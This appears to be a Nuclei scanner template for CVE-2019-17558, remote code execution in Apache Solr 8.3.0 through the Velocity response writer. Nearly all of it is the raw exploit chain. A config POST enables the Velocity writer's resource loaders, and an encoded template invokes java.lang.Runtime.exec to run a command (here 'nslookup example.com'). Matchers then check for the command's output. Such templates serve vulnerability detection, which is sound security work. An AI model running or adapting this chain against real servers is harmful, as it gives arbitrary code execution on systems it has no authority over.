id: CVE-2019-17558 info: name: Apache Solr 8.3.0 - Remote Code Execution via Velocity Template author: pikpikcu,madrobot severity: critical refrense: https://nvd.nist.gov/vuln/detail/CVE-2019-17558 tags: cve,cve2019,apache,rce,solr requests: - raw: - | GET /solr/admin/cores?wt=json HTTP/1.1 Host: {{Hostname}} Accept-Language: en Connection: close - | POST /solr/{{collection}}/config HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Content-Type: application/json Content-Length: 259 Upgrade-Insecure-Requests: 1 { "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } } - | GET /solr/{{collection}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27nslookup%20example.com%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Upgrade-Insecure-Requests: 1 extractors: - type: regex regex: - '"status"\:\{"(.*?)"\:\{"name"' name: collection group: 1 internal: true matchers: - type: word words: - "Non-authoritative answer" - "example.com" condition: and